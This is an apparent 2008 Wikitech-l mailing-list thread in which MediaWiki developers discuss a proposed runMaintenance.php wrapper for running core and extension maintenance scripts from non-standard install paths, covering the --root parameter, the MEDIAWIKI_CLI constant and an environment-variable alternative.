What would you think, if I created a runMaintenance.php script into the /maintenance folder which could be used to call maintenance scripts: I'll write this from my perspective, I run maintenance scripts inside the path that a wiki is installed into because that directory is the real location of the wiki, the actual maintenance and such directories are all symlinks to a central location: php ./maintenance/runMaintenance.php --root=$PWD ./maintenance/scriptname.php args... And similarly for extensions: php ./maintenance/runMaintenance.php --root=$PWD ./extension/ExtName/maintenance/scriptname.php args... The point is: * The script checks for the cli sapi type, aborting if it fails. * The script defines MEDIAWIKI_CLI. * The script sets $IP to either a --root= param you give it (must be specified before maintenance script name), or to a default "realpath( __FILE__ . '/.. );" which is compatible with default installations while allowing non-defaults to work. * The script considers the first non-param argument you give it to be a maintenance script name. And then strips out the script name and all arguments before it (considered to be arguments to the runscript). * The script then includes the maintenance script to be run into itself. * The maintenance script itself uses an $IP path only if MEDIAWIKI_CLI is defined. Otherwise, for backwards compatibility but more security it uses "require_once( dirname(__FILE__) . "/commandLine.inc" );". Extension scripts would use the ../.. trick they normally use.
So basically the form goes: php [path to maintenance]runMaintenance.php [args to runscript] <maintenance script name> [args to maintenance script] And it maintains a fair bit of security while still being lenient on those with non-standard paths who don't want to duplicate things everywhere. You can even run extension maintenance scripts from their extensions folder, or symlink them to the maintenance folder and they'll still work.
~Daniel Friesen(Dantman) of: -The Gaiapedia (http://gaia.wikia.com) -Wikia ACG on Wikia.com (http://wikia.com/wiki/Wikia_ACG) -and Wiki-Tools.com (http://wiki-tools.com)
Mark Clements wrote:
"Simetrical" Simetrical+wikilist@gmail.com wrote in message news:7c2a12e20804221716xaa6f5cflf216ff28c6324015@mail.gmail.com...
On Tue, Apr 22, 2008 at 5:59 PM, Mark Clements wrote:
And, of course, it doesn't help when that's not the case, which is the situation for us. For technical reasons, all extensions are outside the MW source folder entirely.
Symlinks work perfectly in that case (as is true for my localhost, for instance, since it's running a checked-out version of mediawiki/trunk/). I agree it's not great practice, though: maybe you could try to use the current working directory? That seems even less reliable.
I imagine an 'updateExtension' script in the 'maintenance' folder that include()s the appropriate command line/site settings/etc. files then looks for a script with the appropriate name (based on the extension name which is supplied as first arg on command line - 'ExtName' in this example) in the following places.
*/extensions/ExtName/maintenance.php */ExtName/maintenance.php
Where * means anywhere in the include path. If the file exists, run it with the remaining arguments passed through, for which there should be a standardised subset that most extensions use (e.g. 'install' and 'upgrade') though extension-specific items are allowed. If no arg (or an unexpected arg) is provided then the extension file is expected to print out the details about available items (i.e. equivalent to 'help').
- Mark Clements (HappyDog)
Wikitech-l mailing list Wikitech-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikitech-l
Ok, TimStarling's sollution is to use an environment variable and check for it using getenv.
So for example, this is what you would do to a extension script to make it work right: http://svn.wikimedia.org/viewvc/mediawiki/trunk/extensions/CheckUser/install...
I recommend that the form without the environment variable is the one currently in the maintenance script you modify when you make this kind of update. It'll be best for backwards compatibility.
~Daniel Friesen(Dantman) of: -The Gaiapedia (http://gaia.wikia.com) -Wikia ACG on Wikia.com (http://wikia.com/wiki/Wikia_ACG) -and Wiki-Tools.com (http://wiki-tools.com)
DanTMan wrote:
What would you think, if I created a runMaintenance.php script into the /maintenance folder which could be used to call maintenance scripts: I'll write this from my perspective, I run maintenance scripts inside the path that a wiki is installed into because that directory is the real location of the wiki, the actual maintenance and such directories are all symlinks to a central location: php ./maintenance/runMaintenance.php --root=$PWD ./maintenance/scriptname.php args... And similarly for extensions: php ./maintenance/runMaintenance.php --root=$PWD ./extension/ExtName/maintenance/scriptname.php args... The point is:
- The script checks for the cli sapi type, aborting if it fails.
- The script defines MEDIAWIKI_CLI.
- The script sets $IP to either a --root= param you give it (must be
specified before maintenance script name), or to a default "realpath( __FILE__ . '/.. );" which is compatible with default installations while allowing non-defaults to work.
- The script considers the first non-param argument you give it to be a
maintenance script name. And then strips out the script name and all arguments before it (considered to be arguments to the runscript).
- The script then includes the maintenance script to be run into itself.
- The maintenance script itself uses an $IP path only if MEDIAWIKI_CLI
is defined. Otherwise, for backwards compatibility but more security it uses "require_once( dirname(__FILE__) . "/commandLine.inc" );". Extension scripts would use the ../.. trick they normally use.
So basically the form goes: php [path to maintenance]runMaintenance.php [args to runscript] <maintenance script name> [args to maintenance script] And it maintains a fair bit of security while still being lenient on those with non-standard paths who don't want to duplicate things everywhere. You can even run extension maintenance scripts from their extensions folder, or symlink them to the maintenance folder and they'll still work.
~Daniel Friesen(Dantman) of: -The Gaiapedia (http://gaia.wikia.com) -Wikia ACG on Wikia.com (http://wikia.com/wiki/Wikia_ACG) -and Wiki-Tools.com (http://wiki-tools.com)
Mark Clements wrote:
"Simetrical" Simetrical+wikilist@gmail.com wrote in message news:7c2a12e20804221716xaa6f5cflf216ff28c6324015@mail.gmail.com...
On Tue, Apr 22, 2008 at 5:59 PM, Mark Clements wrote:
And, of course, it doesn't help when that's not the case, which is the situation for us. For technical reasons, all extensions are outside the MW source folder entirely.
Symlinks work perfectly in that case (as is true for my localhost, for instance, since it's running a checked-out version of mediawiki/trunk/). I agree it's not great practice, though: maybe you could try to use the current working directory? That seems even less reliable.
I imagine an 'updateExtension' script in the 'maintenance' folder that include()s the appropriate command line/site settings/etc. files then looks for a script with the appropriate name (based on the extension name which is supplied as first arg on command line - 'ExtName' in this example) in the following places.
*/extensions/ExtName/maintenance.php */ExtName/maintenance.php
Where * means anywhere in the include path. If the file exists, run it with the remaining arguments passed through, for which there should be a standardised subset that most extensions use (e.g. 'install' and 'upgrade') though extension-specific items are allowed. If no arg (or an unexpected arg) is provided then the extension file is expected to print out the details about available items (i.e. equivalent to 'help').
- Mark Clements (HappyDog)
Wikitech-l mailing list Wikitech-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikitech-l
Wikitech-l mailing list Wikitech-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikitech-l
wikitech-l@lists.wikimedia.org